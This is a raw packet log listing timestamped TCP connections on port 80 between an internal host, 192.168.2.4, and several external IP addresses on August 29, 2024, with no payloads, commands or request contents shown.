Aug 29, 2024 05:24:55.884146929 CEST	49752	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:55.886243105 CEST	49752	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:55.891088963 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:55.891100883 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:55.891110897 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:55.891120911 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:55.891138077 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:55.891238928 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:55.891248941 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:55.891263962 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:55.891273975 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:56.557802916 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:56.557822943 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:56.557842016 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:56.557853937 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:56.557866096 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:56.557878017 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:56.557893038 CEST	80	49752	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:56.557992935 CEST	49752	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:57.392180920 CEST	49752	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:58.424379110 CEST	49753	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:58.429271936 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:58.429425955 CEST	49753	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:58.431737900 CEST	49753	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:58.436536074 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:59.075531960 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:59.075550079 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:59.075562000 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:59.075575113 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:59.075588942 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:59.075601101 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 29, 2024 05:24:59.075679064 CEST	49753	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:59.075712919 CEST	49753	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:59.078629017 CEST	49753	80	192.168.2.4	194.9.94.85
Aug 29, 2024 05:24:59.083365917 CEST	80	49753	194.9.94.85	192.168.2.4
Aug 29, 2024 05:25:04.532274008 CEST	49754	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:04.537183046 CEST	80	49754	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:04.537406921 CEST	49754	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:04.539912939 CEST	49754	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:04.544672966 CEST	80	49754	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:06.049149036 CEST	49754	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:06.099934101 CEST	80	49754	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:07.074848890 CEST	49755	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:07.079773903 CEST	80	49755	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:07.079848051 CEST	49755	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:07.082343102 CEST	49755	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:07.087137938 CEST	80	49755	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:08.595089912 CEST	49755	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:08.643810987 CEST	80	49755	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:09.613399029 CEST	49756	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:09.965683937 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:09.969393969 CEST	49756	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:09.973195076 CEST	49756	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:09.978008986 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:09.978048086 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:09.978058100 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:09.978079081 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:09.978089094 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:09.978178024 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:09.978187084 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:09.978203058 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:09.978214979 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:11.485738993 CEST	49756	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:11.535799026 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:12.505165100 CEST	49757	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:12.510041952 CEST	80	49757	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:12.510339975 CEST	49757	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:12.512154102 CEST	49757	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:12.516997099 CEST	80	49757	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:25.912097931 CEST	80	49754	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:25.912153006 CEST	49754	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:28.444209099 CEST	80	49755	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:28.444298983 CEST	49755	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:31.330322981 CEST	80	49756	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:31.330379963 CEST	49756	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:33.878596067 CEST	80	49757	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:33.878706932 CEST	49757	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:33.880248070 CEST	49757	80	192.168.2.4	23.251.54.212
Aug 29, 2024 05:25:33.885041952 CEST	80	49757	23.251.54.212	192.168.2.4
Aug 29, 2024 05:25:38.929284096 CEST	49758	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:38.934056997 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:38.935534954 CEST	49758	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:38.939413071 CEST	49758	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:38.944214106 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.547048092 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.547066927 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.547077894 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.547091961 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.547103882 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.547106981 CEST	49758	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:39.547143936 CEST	49758	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:39.547338963 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.547380924 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.547380924 CEST	49758	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:39.547391891 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.547421932 CEST	49758	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:39.547528982 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.547591925 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.547633886 CEST	49758	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:39.552109003 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.552120924 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.552155972 CEST	49758	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:39.552274942 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.552289009 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.552335024 CEST	49758	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:39.633999109 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.634012938 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.634032011 CEST	80	49758	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:39.634056091 CEST	49758	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:39.634082079 CEST	49758	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:40.439568043 CEST	49758	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:41.458988905 CEST	49759	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:41.463877916 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:41.463965893 CEST	49759	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:41.468811989 CEST	49759	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:41.473869085 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.092749119 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.092770100 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.092782021 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.092792988 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.092816114 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.092820883 CEST	49759	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:42.092828989 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.092840910 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.092868090 CEST	49759	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:42.092919111 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.093192101 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.093250036 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.093372107 CEST	49759	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:42.097583055 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.097611904 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.097657919 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.097739935 CEST	49759	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:42.142013073 CEST	49759	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:42.179496050 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.179518938 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.179532051 CEST	80	49759	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:42.179656982 CEST	49759	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:42.970220089 CEST	49759	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:43.988521099 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:43.993490934 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:43.993581057 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:43.995693922 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:44.000586987 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.000603914 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.000655890 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.000673056 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.000725031 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.000735044 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.000771999 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.000782013 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.000793934 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.679150105 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.679171085 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.679182053 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.679193974 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.679207087 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.679219007 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.679229975 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.679240942 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.679240942 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:44.679254055 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.679269075 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.679292917 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:44.679398060 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:44.686290026 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.686302900 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.686314106 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.689230919 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:44.728780031 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:44.961452961 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.961491108 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.961503983 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.961513042 CEST	80	49760	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:44.961628914 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:44.961628914 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:45.501456022 CEST	49760	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:46.519844055 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:46.524754047 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:46.524841070 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:46.529239893 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:46.534008026 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.174886942 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.174907923 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.174926996 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.174938917 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.174952030 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.174963951 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.174973011 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:47.174977064 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.174995899 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.175048113 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.175062895 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.175070047 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:47.175091028 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:47.175106049 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:47.179833889 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.179896116 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.179928064 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.179946899 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:47.179984093 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.180052996 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:47.267410040 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.267493963 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.267570972 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:47.267599106 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:47.267638922 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:47.271302938 CEST	49761	80	192.168.2.4	199.192.19.19
Aug 29, 2024 05:25:47.276135921 CEST	80	49761	199.192.19.19	192.168.2.4
Aug 29, 2024 05:25:52.387439966 CEST	49762	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:52.392213106 CEST	80	49762	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:52.392333984 CEST	49762	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:52.394222975 CEST	49762	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:52.398951054 CEST	80	49762	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:53.110794067 CEST	80	49762	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:53.110893011 CEST	80	49762	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:53.110905886 CEST	80	49762	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:53.110937119 CEST	49762	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:53.114109993 CEST	80	49762	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:53.114155054 CEST	49762	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:53.114238024 CEST	80	49762	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:53.114283085 CEST	49762	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:53.907784939 CEST	49762	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:54.926345110 CEST	49763	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:54.931279898 CEST	80	49763	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:54.935611963 CEST	49763	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:54.939290047 CEST	49763	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:54.944120884 CEST	80	49763	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:55.627763987 CEST	80	49763	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:55.627784014 CEST	80	49763	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:55.627794981 CEST	80	49763	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:55.627809048 CEST	80	49763	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:55.627827883 CEST	49763	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:55.627855062 CEST	49763	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:55.631386042 CEST	80	49763	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:55.631572008 CEST	80	49763	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:55.631623030 CEST	49763	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:56.439685106 CEST	49763	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:57.522914886 CEST	49764	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:57.527863026 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:57.527931929 CEST	49764	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:57.531994104 CEST	49764	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:57.543135881 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:57.543147087 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:57.543157101 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:57.543175936 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:57.543185949 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:57.543194056 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:57.543204069 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:57.543215036 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:57.543224096 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:58.224647045 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:58.224664927 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:58.224678040 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:58.225014925 CEST	49764	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:58.228630066 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:58.228672028 CEST	80	49764	213.145.228.16	192.168.2.4
Aug 29, 2024 05:25:58.228740931 CEST	49764	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:25:59.048446894 CEST	49764	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:26:00.079296112 CEST	49765	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:26:00.084136963 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 29, 2024 05:26:00.087069988 CEST	49765	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:26:00.087069988 CEST	49765	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:26:00.091856956 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 29, 2024 05:26:00.791546106 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 29, 2024 05:26:00.791568995 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 29, 2024 05:26:00.791584969 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 29, 2024 05:26:00.793267012 CEST	49765	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:26:00.796160936 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 29, 2024 05:26:00.796298027 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 29, 2024 05:26:00.796753883 CEST	49765	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:26:00.799035072 CEST	49765	80	192.168.2.4	213.145.228.16
Aug 29, 2024 05:26:00.803831100 CEST	80	49765	213.145.228.16	192.168.2.4
Aug 29, 2024 05:26:05.914524078 CEST	49766	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:05.919348955 CEST	80	49766	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:05.919409990 CEST	49766	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:05.921269894 CEST	49766	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:05.926075935 CEST	80	49766	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:06.576121092 CEST	80	49766	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:06.576144934 CEST	80	49766	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:06.576245070 CEST	49766	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:07.423399925 CEST	49766	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:08.451766968 CEST	49767	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:08.456641912 CEST	80	49767	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:08.460179090 CEST	49767	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:08.461946964 CEST	49767	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:08.466757059 CEST	80	49767	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:09.127635956 CEST	80	49767	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:09.127655983 CEST	80	49767	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:09.127707958 CEST	49767	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:10.001621962 CEST	49767	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:11.023372889 CEST	49768	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:11.031070948 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:11.031531096 CEST	49768	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:11.035337925 CEST	49768	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:11.043255091 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:11.043304920 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:11.043322086 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:11.043330908 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:11.043342113 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:11.043370962 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:11.043426037 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:11.043450117 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:11.043463945 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:11.668750048 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:11.764810085 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:11.764888048 CEST	49768	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:12.548402071 CEST	49768	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:13.567825079 CEST	49769	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:13.572690010 CEST	80	49769	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:13.572763920 CEST	49769	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:13.574906111 CEST	49769	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:13.582457066 CEST	80	49769	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:14.208667040 CEST	80	49769	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:14.208756924 CEST	80	49769	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:14.213515043 CEST	49769	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:14.217294931 CEST	49769	80	192.168.2.4	91.195.240.19
Aug 29, 2024 05:26:14.222089052 CEST	80	49769	91.195.240.19	192.168.2.4
Aug 29, 2024 05:26:27.300683022 CEST	49770	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:27.305506945 CEST	80	49770	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:27.305572987 CEST	49770	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:27.308032990 CEST	49770	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:27.312774897 CEST	80	49770	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:28.818629980 CEST	49770	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:28.823890924 CEST	80	49770	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:28.824009895 CEST	49770	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:29.833240032 CEST	49771	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:29.838845015 CEST	80	49771	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:29.838913918 CEST	49771	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:29.841054916 CEST	49771	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:29.849185944 CEST	80	49771	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:31.345352888 CEST	49771	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:31.350555897 CEST	80	49771	172.67.210.102	192.168.2.4
